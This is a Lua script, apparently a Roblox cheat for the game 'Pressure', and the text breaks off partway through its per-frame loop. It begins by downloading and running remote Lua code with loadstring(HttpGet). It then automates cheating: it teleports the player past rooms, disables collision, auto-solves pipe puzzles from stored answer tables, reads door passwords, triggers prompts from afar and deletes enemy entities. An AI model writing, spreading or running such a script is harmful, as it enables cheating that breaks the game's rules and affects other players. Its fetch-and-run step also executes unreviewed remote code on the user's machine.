game.Lighting.Ambient = Color3.new(1,1,1)
loadstring(game:HttpGet("https://github.com/AZYsGithub/DexPlusPlus/releases/latest/download/out.lua"))()

local Script = {
	Mode = nil,
	Action = "Idle",
	
	Settings = {
		AutoRoomSkipCooldown = {
			Default = 0.2,
			BackArea = 1
		},
		AutoPickCurrency = false,
		
		DeleteLocalEntities = {
			"Pandemonium",
			"Pipsqueak",
			"A200",
			"WitchingHour",
			"GOM"
		}
	},
	
	AutoRoomSkip = false
}

local Main = {
	Player = game.Players.LocalPlayer,
	Character = game.Players.LocalPlayer.Character,
	CharacterRoot = game.Players.LocalPlayer.Character:FindFirstChild("HumanoidRootPart"),
	CurrentCamera = game.Workspace.CurrentCamera,

	GameplayFolder = game.Workspace.GameplayFolder,
	RoomsFolder = game.Workspace.GameplayFolder.Rooms,

	UnCollisionBoxCollisionParts = {}
}

local RoomSkip = {
	OpenedRooms = {},
	NextUngeneratedRoom = nil,

	DoorRoot = nil,
	DoorRootPrompt = nil,
	DoorCollisionPartCFrame = nil,
	DoorTouchPart = nil,

	LockMain = nil,
	LockPrompt = nil,
	LockRemoteFunction = nil,

	Enter = nil,
	Exit = nil,

	Keycard = nil,
	KeycardParentPartCFrame = nil,
	KeycardProxyPart = nil,
	KeycardProxyPartPrompt = nil,
	Password = nil,
	PasswordCode = nil,

	EndRunButtonHighlight = nil,
	EndRunButtonHighlightCFrame = nil,
	EndRunButtonHighlightPrompt = nil,

	ElevatorHighlightCFrame = nil,

	PressureDoors = {
		["NormalDoor"] = {
			Root = {
				[1] = "Root"
			},
			CollisionPart = {
				[1] = "CollisionPart"
			},
			LockMain = {
				[1] = "Lock",
				[2] = "Main"
			},
			LockPrompt = {
				[1] = "Lock",
				[2] = "Main"
			},
			LockRemoteFunction = {
				[1] = "Lock",
				[2] = "Main"
			}
		},
		["BigDoor"] = {
			Root = {
				[1] = "Root"
			},
			CollisionPart = {
				[1] = "CollisionPart"
			},
			LockMain = {
				[1] = "HeavyLock",
				[2] = "Main"
			},
			LockPrompt = {
				[1] = "HeavyLock",
				[2] = "Main"
			}
		},
		["DoubleDoor"] = {
			DoubleDoor = true,
			DoorOfDoubleDoor = "NormalDoor",
			Root = {
				[1] = "Root"
			},
			CollisionPart = {
				[1] = "CollisionPart"
			},
			LockMain = {
				[1] = "Lock",
				[2] = "Main"
			},
			LockPrompt = {
				[1] = "Lock",
				[2] = "Main"
			},
			LockRemoteFunction = {
				[1] = "Lock",
				[2] = "Main"
			}
		},
		["DoubleDoorSewer"] = {
			DoubleDoor = true,
			DoorOfDoubleDoor = "NormalDoor",
			Root = {
				[1] = "Root"
			},
			CollisionPart = {
				[1] = "CollisionPart"
			},
			LockMain = {
				[1] = "Lock",
				[2] = "Main"
			},
			LockPrompt = {
				[1] = "Lock",
				[2] = "Main"
			},
			LockRemoteFunction = {
				[1] = "Lock",
				[2] = "Main"
			}
		},
		["LargeRoundDoor"] = {
			Root = {
				[1] = "RootPart"
			},
			CollisionPart = {
				[1] = "CollisionPart"
			},
			TouchPart = {
				[1] = "TouchPart"
			}
		}
	},
	
	BoardPuzzles = {
		["Board1"] = {
			["1-1"] = {180},
			["2-1"] = {0},
			["2-2"] = {0, 180},
			["2-3"] = {0, 180},
			["2-4"] = {0, 180},
			["2-5"] = {0, 180},
			["2-6"] = {180},
			["3-6"] = {90, -90},
			["4-6"] = {0, 90},
			["4-7"] = {-90},
			["3-7"] = {90, -90},
			["2-7"] = {90},
			["2-8"] = {180, -90},
			["3-8"] = {0}
		},
		["Board2"] = {
			["1-1"] = {0, 180},
			["1-2"] = {180},
			["2-2"] = {90, -90},
			["3-2"] = {90, -90},
			["4-2"] = {0},
			["4-3"] = {0, 180},
			["4-4"] = {0, 180},
			["4-5"] = {-90},
			["3-5"] = {90, -90},
			["2-5"] = {180},
			["2-4"] = {0, 180},
			["2-3"] = {0},
			["1-3"] = {90},
			["1-4"] = {0, 180},
			["1-5"] = {0, 180},
			["1-6"] = {180},
			["1-7"] = {180, -90},
			["2-7"] = {0},
			["2-8"] = {180},
			["3-8"] = {0}
		},
		["Board3"] = {
			["1-1"] = {0, 180},
			["1-2"] = {180},
			["2-2"] = {90, -90},
			["3-2"] = {0, 90},
			["3-3"] = {0, 180},
			["3-4"] = {180},
			["4-4"] = {0},
			["4-5"] = {0, 180},
			["4-6"] = {0, 180},
			["4-7"] = {-90},
			["3-7"] = {90, -90},
			["2-7"] = {90},
			["2-8"] = {180},
			["3-8"] = {0}
		},
		["Board4"] = {
			["1-1"] = {0, 180},
			["1-2"] = {180},
			["2-2"] = {90, -90},
			["3-2"] = {90, -90},
			["4-2"] = {0},
			["4-3"] = {0, 180},
			["4-4"] = {-90},
			["3-4"] = {180},
			["3-3"] = {0, 90},
			["2-3"] = {90, -90},
			["1-3"] = {90},
			["1-4"] = {0, 180},
			["1-5"] = {0, 180},
			["1-6"] = {0, 180},
			["1-7"] = {180, -90},
			["2-7"] = {0, -90},
			["2-6"] = {0, 180},
			["2-5"] = {90},
			["3-5"] = {0},
			["3-6"] = {0, 180},
			["3-7"] = {0, 180},
			["3-8"] = {0, 180}
		},
		["Board5"] = {
			["1-1"] = {0, 180},
			["1-2"] = {180},
			["2-2"] = {-90},
			["2-1"] = {90},
			["3-1"] = {0},
			["3-2"] = {0, 180},
			["3-3"] = {-90},
			["2-3"] = {90, -90},
			["1-3"] = {90},
			["1-4"] = {0, 180},
			["1-5"] = {0, 180},
			["1-6"] = {180},
			["2-6"] = {0, -90},
			["2-5"] = {90},
			["3-5"] = {-90},
			["3-4"] = {90},
			["4-4"] = {0},
			["4-5"] = {0, 180},
			["4-6"] = {0, 180},
			["4-7"] = {-90},
			["3-7"] = {90},
			["3-8"] = {0, 180},

			["1-7"] = {0, 180}
		},
		["Board6"] = {
			["1-1"] = {180},
			["2-1"] = {0},
			["2-2"] = {0, 180},
			["2-3"] = {180},
			["3-3"] = {-90},
			["3-2"] = {0, 180},
			["3-1"] = {90},
			["4-1"] = {0},
			["4-2"] = {0, 180},
			["4-3"] = {0, 180},
			["4-4"] = {-90},
			["3-4"] = {90},
			["3-5"] = {180},
			["4-5"] = {0},
			["4-6"] = {0, 180},
			["4-7"] = {0, 180},
			["4-8"] = {-90},
			["3-8"] = {90}
		},
		["Board7"] = {
			["1-1"] = {180, -90},
			["2-1"] = {0},
			["2-2"] = {180},
			["3-2"] = {-90},
			["3-1"] = {90},
			["4-1"] = {0},
			["4-2"] = {0, 180},
			["4-3"] = {-90},
			["3-3"] = {90, -90},
			["2-3"] = {90, -90},
			["1-3"] = {90},
			["1-4"] = {180, -90},
			["2-4"] = {90, -90},
			["3-4"] = {0},
			["3-5"] = {0, 180},
			["3-6"] = {180},
			["4-6"] = {0},
			["4-7"] = {-90},
			["3-7"] = {90, -90},
			["2-7"] = {90},
			["2-8"] = {180},
			["3-8"] = {0}
		},
		["Board8"] = {
			["1-1"] = {0, 180},
			["1-2"] = {0, 180},
			["1-3"] = {0, 180},
			["1-4"] = {180},
			["2-4"] = {-90},
			["2-3"] = {0, 180},
			["2-2"] = {90},
			["3-2"] = {90, -90},
			["4-2"] = {0},
			["4-3"] = {0, 180},
			["4-4"] = {-90},
			["3-4"] = {90},
			["3-5"] = {-90},
			["2-5"] = {90, -90},
			["1-5"] = {90},
			["1-6"] = {0, 180},
			["1-7"] = {0, 180},
			["1-8"] = {180},
			["2-8"] = {90, -90},
			["3-8"] = {0}
		},
		["Board9"] = {
			["1-1"] = {0, 180},
			["1-2"] = {0, 180},
			["1-3"] = {0, 180},
			["1-4"] = {0, 180},
			["1-5"] = {0, 180},
			["1-6"] = {0, 180},
			["1-7"] = {180},
			["2-7"] = {-90},
			["3-7"] = {-90},
			["3-6"] = {0, 180},
			["3-5"] = {90},
			["4-5"] = {0},
			["4-6"] = {0, 180},
			["4-7"] = {0, 180},
			["4-8"] = {-90},
			["3-8"] = {90},

			["2-6"] = {0, 180},
			["2-5"] = {0, 180},
			["2-4"] = {0, 180},
			["2-3"] = {90},
			["3-3"] = {90, -90}
		},
		["Board11"] = {
			["1-1"] = {0, 180},
			["1-2"] = {0, 180},
			["1-3"] = {0, 180},
			["1-4"] = {180},
			["2-4"] = {90, -90},
			["3-4"] = {-90},
			["3-3"] = {90},
			["4-3"] = {0},
			["4-4"] = {0, 180},
			["4-5"] = {0, 180},
			["4-6"] = {-90},
			["3-6"] = {90, -90},
			["2-6"] = {90},
			["2-7"] = {0, 180},
			["2-8"] = {180},
			["3-8"] = {0}
		},
		["Board12"] = {
			["1-1"] = {0, 180},
			["1-2"] = {0, 180},
			["1-3"] = {0, 180},
			["1-4"] = {0, 180},
			["1-5"] = {0, 180},
			["1-6"] = {180, -90},
			["2-6"] = {-90},
			["2-5"] = {0, 180},
			["2-4"] = {0, 180},
			["2-3"] = {0, 180},
			["2-2"] = {90},
			["3-2"] = {0},
			["3-3"] = {0, 180},
			["3-4"] = {0, 180},
			["3-5"] = {0, 180},
			["3-6"] = {0, 180},
			["3-7"] = {0, 180},
			["3-8"] = {0, 180}
		},
		["Board13"] = {
			["1-1"] = {0, 180},
			["1-2"] = {180, -90},
			["2-2"] = {0},
			["2-3"] = {180},
			["3-3"] = {90, -90},
			["4-3"] = {0},
			["4-4"] = {0, 180},
			["4-5"] = {0, 180},
			["4-6"] = {-90},
			["3-6"] = {90},
			["3-7"] = {0, 180},
			["3-8"] = {0, 180}
		},
		["Board14"] = {
			["1-1"] = {0, 180},
			["1-2"] = {180, -90},
			["2-2"] = {-90},
			["2-1"] = {90},
			["3-1"] = {90, -90},
			["4-1"] = {0},
			["4-2"] = {0, 180},
			["4-3"] = {-90},
			["3-3"] = {90, -90},
			["2-3"] = {90},
			["2-4"] = {0, 180},
			["2-5"] = {0, 180},
			["2-6"] = {0, 180},
			["2-7"] = {180},
			["3-7"] = {90, -90},
			["4-7"] = {0},
			["4-8"] = {-90},
			["3-8"] = {90},
		},
		["Board15"] = {
			["1-1"] = {0, 180},
			["1-2"] = {180, -90},
			["2-2"] = {0},
			["2-3"] = {0, 180},
			["2-4"] = {-90},
			["3-4"] = {90, -90},
			["4-4"] = {0},
			["4-5"] = {-90},
			["3-5"] = {90},
			["2-5"] = {90, -90},
			["1-5"] = {90},
			["1-6"] = {180},
			["2-6"] = {0, 90},
			["2-7"] = {-90},
			["3-7"] = {90, -90},
			["4-7"] = {0},
			["4-8"] = {-90},
			["3-8"] = {90},

			["2-1"] = {90},
			["3-1"] = {90},
			["3-2"] = {0, 180},
			["3-3"] = {180},

			["3-6"] = {180},

			["1-7"] = {90}
		}
	}
}

local Currency = {
	MinCurrency = 0,
	MaxCurrency = 0,
	
	CurrentProxyPart = nil,
	CurrentProxyPartCFrame = nil,
	CurrentProxyPartPrompt = nil
}

function PartInFrontOfCamera(Part, LookVectorOffset)
	Part.CFrame = CFrame.new(
		Main.CurrentCamera.CFrame.Position + Main.CurrentCamera.CFrame.LookVector * LookVectorOffset
	) * CFrame.fromOrientation(0, 0, 0)
end

function GetMoneyFrom(Folder)
	if Script.Settings.AutoPickCurrency == true then
		for _, Drawer in Folder:GetChildren() do
			if Drawer:FindFirstChild("SpawnLocations") then
				for _, SpawnLocation in Drawer.SpawnLocations:GetChildren() do
					for _, Money in SpawnLocation:GetChildren() do
						if Money:FindFirstChild("ProxyPart") and Money:GetAttribute("InteractionType") and Money:GetAttribute("Amount") then
							Currency.CurrentProxyPart = Money.ProxyPart
							Currency.CurrentProxyPartCFrame = Money.ProxyPart.CFrame
							for _, Prompt in Money.ProxyPart:GetChildren() do
								if Prompt:IsA("ProximityPrompt") then
									if Prompt.Exclusivity == Enum.ProximityPromptExclusivity.OnePerButton then
										Currency.CurrentProxyPartPrompt = Prompt
									end
								end
							end
							return
						end
					end
				end
			end
		end
	end
	
	Currency.CurrentProxyPart = nil
	Currency.CurrentProxyPartCFrame = nil
	Currency.CurrentProxyPartPrompt = nil
end

function FindMoney()
	for _, Room in Main.RoomsFolder:GetChildren() do
		GetMoneyFrom(Room)
		if Room:FindFirstChild("Interactables") then
			GetMoneyFrom(Room.Interactables)
		end
	end
end

function ClearAllStats(Debug)
	if Debug == true then
		Script.Mode = nil
		for _, Part in Main.UnCollisionBoxCollisionParts do
			if Part ~= nil then
				if Part.Parent ~= nil then
					if Part:IsA("BasePart") and Part.Name ~= "CollisionPart" then
						Part.CanCollide = true
					end
				end
			end
		end

		if RoomSkip.NextUngeneratedRoom ~= nil then
			print("Clear stats of Room: "..RoomSkip.NextUngeneratedRoom.Name)
		end
		if RoomSkip.DoorRoot ~= nil then
			print("DoorRoot")
		end
		if RoomSkip.DoorRootPrompt ~= nil then
			print("DoorRootPrompt")
		end
		if RoomSkip.DoorCollisionPartCFrame ~= nil then
			print("DoorCollisionPartCFrame")
		end
		if RoomSkip.DoorTouchPart ~= nil then
			print("DoorTouchPart")
		end
		if RoomSkip.DoorRootPrompt ~= nil then
			print("DoorRootPrompt")
		end
		if RoomSkip.LockPrompt ~= nil then
			print("LockPrompt")
		end
		if RoomSkip.LockRemoteFunction ~= nil then
			print("LockRemoteFunction")
		end
		if RoomSkip.Enter ~= nil then
			print("Enter")
		end
		if RoomSkip.Exit ~= nil then
			print("Exit")
		end
		if RoomSkip.Keycard ~= nil then
			print("Keycard")
		end
		if RoomSkip.KeycardParentPartCFrame ~= nil then
			print("KeycardParentPartCFrame")
		end
		if RoomSkip.KeycardProxyPart ~= nil then
			print("KeycardProxyPart")
		end
		if RoomSkip.KeycardProxyPartPrompt ~= nil then
			print("KeycardProxyPartPrompt")
		end
		if RoomSkip.Password ~= nil then
			print("Password")
		end
		if RoomSkip.PasswordCode ~= nil then
			print("PasswordCode: "..RoomSkip.PasswordCode)
		end
	end
	RoomSkip.DoorRoot = nil
	RoomSkip.DoorRootPrompt = nil
	RoomSkip.DoorCollisionPartCFrame = nil
	RoomSkip.DoorTouchPart = nil
	RoomSkip.DoorRootPrompt = nil
	RoomSkip.LockPrompt = nil
	RoomSkip.LockRemoteFunction = nil
	RoomSkip.Enter = nil
	RoomSkip.Exit = nil
	RoomSkip.Keycard = nil
	RoomSkip.KeycardParentPartCFrame = nil
	RoomSkip.KeycardProxyPart = nil
	RoomSkip.KeycardProxyPartPrompt = nil
	RoomSkip.Password = nil
	RoomSkip.PasswordCode = nil
	RoomSkip.PipeRoomStatus = "Idle"
end

function GetNextUngeneratedRoom(SpecificRoom)
	local RoomsInExitValue = {}
	for _, Room in Main.RoomsFolder:GetChildren() do
		if Room:FindFirstChild("Entrances") then
			for PressureDoorName, PressureDoor in RoomSkip.PressureDoors do
				local Door = Room.Entrances:FindFirstChild(PressureDoorName)
				if Door ~= nil then
					if Door:FindFirstChild("Exit") then
						if Door.Exit:IsA("ObjectValue") then
							local ExitRoom = Door.Exit.Value
							if ExitRoom ~= nil then
								if ExitRoom.Parent ~= nil then
									table.insert(RoomsInExitValue, ExitRoom)
								end
							end
						end
					end
				end
			end
		end
	end

	for _, Room in Main.RoomsFolder:GetChildren() do
		if table.find(RoomsInExitValue, Room) == nil and Room:GetAttribute("Room") and (Room == SpecificRoom or SpecificRoom == nil) then
			RoomSkip.NextUngeneratedRoom = Room
		end
	end
end

function RoomStats()
	if RoomSkip.NextUngeneratedRoom ~= nil then
		if RoomSkip.NextUngeneratedRoom.Parent == Main.RoomsFolder then
			if RoomSkip.NextUngeneratedRoom:FindFirstChild("Entrances") then
				for PressureDoorName, PressureDoor in RoomSkip.PressureDoors do
					local Door = RoomSkip.NextUngeneratedRoom.Entrances:FindFirstChild(PressureDoorName)
					local OriginalDoor = Door
					if Door ~= nil then
						if PressureDoor.DoubleDoor then
							if not Door:FindFirstChild(PressureDoor.DoorOfDoubleDoor) then
								print("ERROR | Double Door '"..PressureDoorName.."' has not single door '"..PressureDoor.DoorOfDoubleDoor.."' in room '"..RoomSkip.NextUngeneratedRoom.Name.."'")
							else
								local MinY = nil
								for _, NormalDoor in Door:GetChildren() do
									if NormalDoor.Name == PressureDoor.DoorOfDoubleDoor and NormalDoor:FindFirstChild("CollisionPart") then
										if MinY == nil then
											Door = NormalDoor
										else
											if MinY > NormalDoor.CollisionPart.Position.Y then
												Door = NormalDoor
											end
										end
										MinY = NormalDoor.CollisionPart.Position.Y
									end
								end
							end
						end

						local OpenValue = Door:WaitForChild("OpenValue")
						if OpenValue == nil then
							print("ERROR | Door '"..PressureDoorName.."'' has not 'OpenValue' in room '"..RoomSkip.NextUngeneratedRoom.Name.."'")
						else
							if not OpenValue:IsA("BoolValue") then
								print("ERROR | Door '"..PressureDoorName.."'' has 'OpenValue' but it is not BoolValue in room '"..RoomSkip.NextUngeneratedRoom.Name.."'")
							else
								OpenValue:GetPropertyChangedSignal("Value"):Once(function()
									if OpenValue.Value == true and Script.Action ~= "RoomSkip Start" then
										local SkipCooldown = Script.Settings.AutoRoomSkipCooldown.Default
										if RoomSkip.NextUngeneratedRoom:GetAttribute("RoomFamily") == "BackArea" then
											SkipCooldown = Script.Settings.AutoRoomSkipCooldown.BackArea
										end
										ClearAllStats()
										if Script.AutoRoomSkip == true then
											task.wait(SkipCooldown)
											TeleportToDoor()
										end
									end
								end)
							end
						end

						local DoorRoot = Door
						local DoorRootPrompt = nil
						local DoorCollisionPart = Door
						local DoorTouchPart = Door
						local Enter = OriginalDoor:FindFirstChild("Enter")
						local Exit = OriginalDoor:FindFirstChild("Exit")

						if PressureDoor.Root == nil then
							DoorRoot = nil
						else
							for _, RootPath in PressureDoor.Root do
								DoorRoot = DoorRoot:FindFirstChild(RootPath)
							end
						end

						if DoorRoot ~= nil then
							DoorRootPrompt = DoorRoot:FindFirstChildWhichIsA("ProximityPrompt")
						end

						if PressureDoor.CollisionPart == nil then
							DoorCollisionPart = nil
						else
							for _, CollisionPartPath in PressureDoor.CollisionPart do
								DoorCollisionPart = DoorCollisionPart:FindFirstChild(CollisionPartPath)
							end
						end

						if PressureDoor.TouchPart == nil then
							DoorTouchPart = nil
						else
							for _, TouchPartPath in PressureDoor.TouchPart do
								DoorTouchPart = DoorTouchPart:FindFirstChild(TouchPartPath)
							end
						end

						if not Enter:IsA("ObjectValue") then
							Enter = nil
						end

						if not Exit:IsA("ObjectValue") then
							Exit = nil
						end

						for _, LockedRoom in Main.RoomsFolder:GetChildren() do
							RoomSkip.Keycard = LockedRoom:FindFirstChild("NormalKeyCard", true)
							if RoomSkip.Keycard == nil then
								RoomSkip.Keycard = LockedRoom:FindFirstChild("RidgeKeyCard", true)
							end
							RoomSkip.Password = LockedRoom:FindFirstChild("PasswordPaper", true)
							if RoomSkip.Keycard ~= nil then
								if RoomSkip.Keycard.Parent ~= nil then
									if RoomSkip.Keycard.Parent:IsA("BasePart") then
										RoomSkip.KeycardParentPartCFrame = RoomSkip.Keycard.Parent.CFrame
									end
								end
								if RoomSkip.Keycard:FindFirstChild("ProxyPart") then
									if RoomSkip.Keycard.ProxyPart:IsA("BasePart") then
										RoomSkip.KeycardProxyPart = RoomSkip.Keycard.ProxyPart
									end
									if RoomSkip.Keycard.ProxyPart:FindFirstChildWhichIsA("ProximityPrompt") then
										RoomSkip.KeycardProxyPartPrompt = RoomSkip.Keycard.ProxyPart:FindFirstChildWhichIsA("ProximityPrompt")
									end
								end
								break
							elseif RoomSkip.Password ~= nil then
								if RoomSkip.Password:FindFirstChild("Code") then
									if RoomSkip.Password.Code:FindFirstChildWhichIsA("SurfaceGui") then
										if RoomSkip.Password.Code:FindFirstChildWhichIsA("SurfaceGui"):FindFirstChildWhichIsA("TextLabel") then
											RoomSkip.PasswordCode = RoomSkip.Password.Code:FindFirstChildWhichIsA("SurfaceGui"):FindFirstChildWhichIsA("TextLabel").Text
										end
									end
								end
								break
							end
						end

						if RoomSkip.Keycard ~= nil or RoomSkip.Password ~= nil then
							local LockMain = Door
							local LockPrompt = Door
							local LockRemoteFunction = Door

							if PressureDoor.LockMain == nil then
								LockMain = nil
							else
								for _, LockMainPath in PressureDoor.LockMain do
									LockMain = LockMain:FindFirstChild(LockMainPath)
								end
							end

							if PressureDoor.LockPrompt == nil then
								LockPrompt = nil
							else
								for _, LockPromptPath in PressureDoor.LockPrompt do
									LockPrompt = LockPrompt:FindFirstChild(LockPromptPath)
								end
								if LockPrompt ~= nil then
									LockPrompt = LockPrompt:FindFirstChildWhichIsA("ProximityPrompt")
								end
							end

							if PressureDoor.LockRemoteFunction == nil then
								LockRemoteFunction = nil
							else
								for _, LockRemoteFunctionPath in PressureDoor.LockRemoteFunction do
									LockRemoteFunction = LockRemoteFunction:FindFirstChild(LockRemoteFunctionPath)
								end
								if LockRemoteFunction ~= nil then
									LockRemoteFunction = LockRemoteFunction:FindFirstChildWhichIsA("RemoteFunction")
								end
							end

							RoomSkip.LockMain = LockMain
							RoomSkip.LockPrompt = LockPrompt
							RoomSkip.LockRemoteFunction = LockRemoteFunction
						end
						if Exit ~= nil then
							if Exit.Value.Name == "ModifierEnding" then
								if Exit.Value:FindFirstChild("Interactables") then
									if Exit.Value.Interactables:FindFirstChild("EndRun") then
										if Exit.Value.Interactables.EndRun:FindFirstChild("Highlight") then
											RoomSkip.EndRunButtonHighlight = Exit.Value.Interactables.EndRun.Highlight
											RoomSkip.EndRunButtonHighlightCFrame = Exit.Value.Interactables.EndRun.Highlight.CFrame
											if Exit.Value.Interactables.EndRun.Highlight:FindFirstChildWhichIsA("ProximityPrompt") then
												RoomSkip.EndRunButtonHighlightPrompt = Exit.Value.Interactables.EndRun.Highlight:FindFirstChildWhichIsA("ProximityPrompt")
											end
										end
									end
								end
							end
						end

						RoomSkip.DoorRoot = DoorRoot
						RoomSkip.DoorRootPrompt = DoorRootPrompt
						RoomSkip.DoorCollisionPartCFrame = DoorCollisionPart.CFrame
						RoomSkip.DoorTouchPart = DoorTouchPart
						RoomSkip.Enter = Enter
						RoomSkip.Exit = Exit
					end
				end
			end
		end
	end
end

function TeleportToDoor(LastOpened)
	Script.Mode = "RoomSkip"
	Script.Action = "RoomSkip Start"
	GetNextUngeneratedRoom()
	RoomStats()
end

function UnCollisionAll(TeleportCFrame)
	for _, Part in Main.UnCollisionBoxCollisionParts do
		if Part ~= nil then
			if Part.Parent ~= nil then
				if Part:IsA("BasePart") and Part.Name ~= "CollisionPart" then
					Part.CanCollide = true
				end
			end
		end
	end

	local TemporaryFloor = game.Workspace:FindFirstChild("TemporaryFloor")
	if TemporaryFloor == nil then
		TemporaryFloor = Instance.new("Part", game.Workspace)
		TemporaryFloor.Name = "TemporaryFloor"
		TemporaryFloor.Transparency = 0.5
		TemporaryFloor.Anchored = true
		TemporaryFloor.CanCollide = true
		TemporaryFloor.CastShadow = false
		TemporaryFloor.Size = Vector3.new(8, 1, 8)
	end

	local UncollisionBox = game.Workspace:FindFirstChild("UncollisionBox")
	if UncollisionBox == nil then
		UncollisionBox = Instance.new("Part", game.Workspace)
		UncollisionBox.Name = "UncollisionBox"
		UncollisionBox.Transparency = 0.5
		UncollisionBox.Anchored = true
		UncollisionBox.CanCollide = false
		UncollisionBox.CastShadow = false
		UncollisionBox.Size = Vector3.new(8, 8, 8)
	end

	UncollisionBox.CFrame = TeleportCFrame
	TemporaryFloor.CFrame = TeleportCFrame + Vector3.new(0, -4, 0)

	for _, Part in game.Workspace:GetPartsInPart(UncollisionBox) do
		if Part.Parent ~= game.Players.LocalPlayer.Character and Part:IsA("BasePart") then
			if Part:GetAttribute("Active") and Part:GetAttribute("Damage") then
				Part:Destroy()
				print("Deleted Dangerous Part")
			end
			if Part.CanCollide == true and Part ~= TemporaryFloor then
				Part.CanCollide = false
				table.insert(Main.UnCollisionBoxCollisionParts, Part)
			end
		end
	end
end

function ChangePipes(Room)
	local Finished = true
	
	if Room ~= nil then
		for Board, Pipes in RoomSkip.BoardPuzzles do
			if Room:FindFirstChild(Board) then
				if Room[Board]:FindFirstChild("puzzle") and Room[Board]:FindFirstChild("Main") and Room[Board]:FindFirstChild("Power") then
					local BoardPuzzleMain = Room[Board].Main
					local PowerPipe = Room[Board].Power

					for PipePosition, PipeRotation in Pipes do
						if Main.CharacterRoot ~= nil then
							local TeleportCFrame = BoardPuzzleMain.CFrame
							UnCollisionAll(TeleportCFrame)
							Main.CharacterRoot.CFrame = TeleportCFrame
							
							local Column = tonumber(string.split(PipePosition, "-")[1])
							local Row = tonumber(string.split(PipePosition, "-")[2])

							local PipeFindPart = game.Workspace:FindFirstChild("BoardPuzzlePipeFindPart")
							if PipeFindPart == nil then
								PipeFindPart = Instance.new("Part", game.Workspace)
								PipeFindPart.Name = "BoardPuzzlePipeFindPart"
								PipeFindPart.Transparency = 0.5
								PipeFindPart.Anchored = true
								PipeFindPart.CanCollide = true
								PipeFindPart.CastShadow = false
								PipeFindPart.Size = Vector3.new(0.5, 0.5, 0.5)
							end

							PipeFindPart.Position = PowerPipe.Position - (BoardPuzzleMain.CFrame.UpVector * (1.5 * (Column - 1)) + BoardPuzzleMain.CFrame.RightVector * (1.5 * Row))

							for _, PipePart in game.Workspace:GetPartsInPart(PipeFindPart) do
								if PipePart.Name == "Part" and PipePart.Parent ~= nil then
									if PipePart.Parent.Parent ~= nil then
										if PipePart.Parent.Parent == Room[Board].puzzle then
											local NeedRotate = true
											for _, Degree in PipeRotation do
												if math.round(PipePart.Orientation.Z) ~= -180 then
													if math.round(PipePart.Orientation.Z) == Degree then
														NeedRotate = false
													end
												else
													if math.round(math.abs(PipePart.Orientation.Z)) == Degree then
														NeedRotate = false
													end
												end
											end

											if NeedRotate == true then
												if PipePart.Parent:FindFirstChild("Highlight") then
													if PipePart.Parent.Highlight:FindFirstChildWhichIsA("ProximityPrompt") then						
														local PromptPressed = false
														PipePart.Parent.Highlight:FindFirstChildWhichIsA("ProximityPrompt").Triggered:Connect(function()
															PromptPressed = true
														end)
														
														while PromptPressed == false do
															for _, OtherPipes in Room[Board].puzzle:GetChildren() do 
																if OtherPipes:FindFirstChild("Highlight") then
																	if OtherPipes.Highlight:FindFirstChildWhichIsA("ProximityPrompt") then
																		OtherPipes.Highlight:FindFirstChildWhichIsA("ProximityPrompt").Enabled = false
																	end
																end
															end
															
															PipePart.Parent.Highlight.Anchored = true
															PartInFrontOfCamera(PipePart.Parent.Highlight, 3)
															PipePart.Parent.Highlight:FindFirstChildWhichIsA("ProximityPrompt").MaxActivationDistance = 100
															PipePart.Parent.Highlight:FindFirstChildWhichIsA("ProximityPrompt").Enabled = true
															PipePart.Parent.Highlight:FindFirstChildWhichIsA("ProximityPrompt"):InputHoldBegin()
															PipePart.Parent.Highlight:FindFirstChildWhichIsA("ProximityPrompt"):InputHoldEnd()
															task.wait()
														end
									
													end
												end
												Finished = false	
											end
										end
									end
								end
							end
						end
					end
				end
			end
		end
	end
	
	if Finished == false then
		task.wait(0.5)
	end
	
	return Finished
end

game:GetService("RunService").RenderStepped:Connect(function()
	local ScriptActionNow = "Idle"

	for _, LocalEntity in Script.Settings.DeleteLocalEntities do
		if LocalEntity == "Pandemonium" then
			for _, Pande in {
				"Pandemonium",
				"Anglemonium",
				"Pinkimonium",
				"Frogermonium",
				"Blitzemonium",
				"Pandesmoker"
				} do
				if game.Workspace:FindFirstChild(Pande) then
					game.Workspace[Pande]:Destroy()
					print(Pande.." Destroyed")
				end
			end
		elseif LocalEntity == "Pipsqueak" then
			for _, Pip in {
				"Pipsqueak",
				"RidgePipsqueak"
				} do
				if game.Workspace:FindFirstChild(Pip) then
					game.Workspace[Pip]:Destroy()
					print(Pip.." Destroyed")
				end
			end
		elseif LocalEntity == "A200" then
			if game.Workspace:FindFirstChild("A200") then
				game.Workspace.A200:Destroy()
				print(LocalEntity.." Destroyed")
			end
		elseif LocalEntity == "WitchingHour" then
			if game.Workspace:FindFirstChild("WitchingHour") then
				game.Workspace.WitchingHour:Destroy()
				print(LocalEntity.." Destroyed")
			end
		elseif LocalEntity == "GOM" then
			if game.Players.LocalPlayer.PlayerGui:FindFirstChild("Main") then
				if game.Players.LocalPlayer.PlayerGui.Main:FindFirstChild("GOMFrame") then
					game.Players.LocalPlayer.PlayerGui.Main.GOMFrame:Destroy()
					print(LocalEntity.." Can't Spawn Anymore. Can Cause Errors In F9. Rejoin If You Want To Fix It")
				end
			end
		end
	end

	if Script.Mode == "RoomSkip" then
		if game.Workspace:FindFirstChild("Elevator") then
			if game.Workspace.Elevator:FindFirstChild("ElevatorKey") then
				if game.Workspace.Elevator.ElevatorKey:FindFirstChild("Highlight") then
					if RoomSkip.ElevatorHighlightCFrame == nil then
						RoomSkip.ElevatorHighlightCFrame = game.Workspace.Elevator.ElevatorKey.Highlight.CFrame
					end
					if game.Workspace.Elevator.ElevatorKey.Highlight:FindFirstChildWhichIsA("ProximityPrompt") then
						ScriptActionNow = "Press ElevatorPrompt"
						PartInFrontOfCamera(game.Workspace.Elevator.ElevatorKey.Highlight, 7)

						game.Workspace.Elevator.ElevatorKey.Highlight:FindFirstChildWhichIsA("ProximityPrompt")
						game.Workspace.Elevator.ElevatorKey.Highlight:FindFirstChildWhichIsA("ProximityPrompt").MaxActivationDistance = 100
						game.Workspace.Elevator.ElevatorKey.Highlight:FindFirstChildWhichIsA("ProximityPrompt").RequiresLineOfSight = false
						game.Workspace.Elevator.ElevatorKey.Highlight:FindFirstChildWhichIsA("ProximityPrompt"):InputHoldBegin()
						game.Workspace.Elevator.ElevatorKey.Highlight:FindFirstChildWhichIsA("ProximityPrompt"):InputHoldEnd()

						local TeleportCFrame = RoomSkip.ElevatorHighlightCFrame
						UnCollisionAll(TeleportCFrame)
						Main.CharacterRoot.CFrame = TeleportCFrame
					end
				end
			end
		else
			for _, Room in Main.RoomsFolder:GetChildren() do
				if Room:FindFirstChild("Elevator") then
					GetNextUngeneratedRoom(Room)
					RoomStats()
				end
			end
		end
		
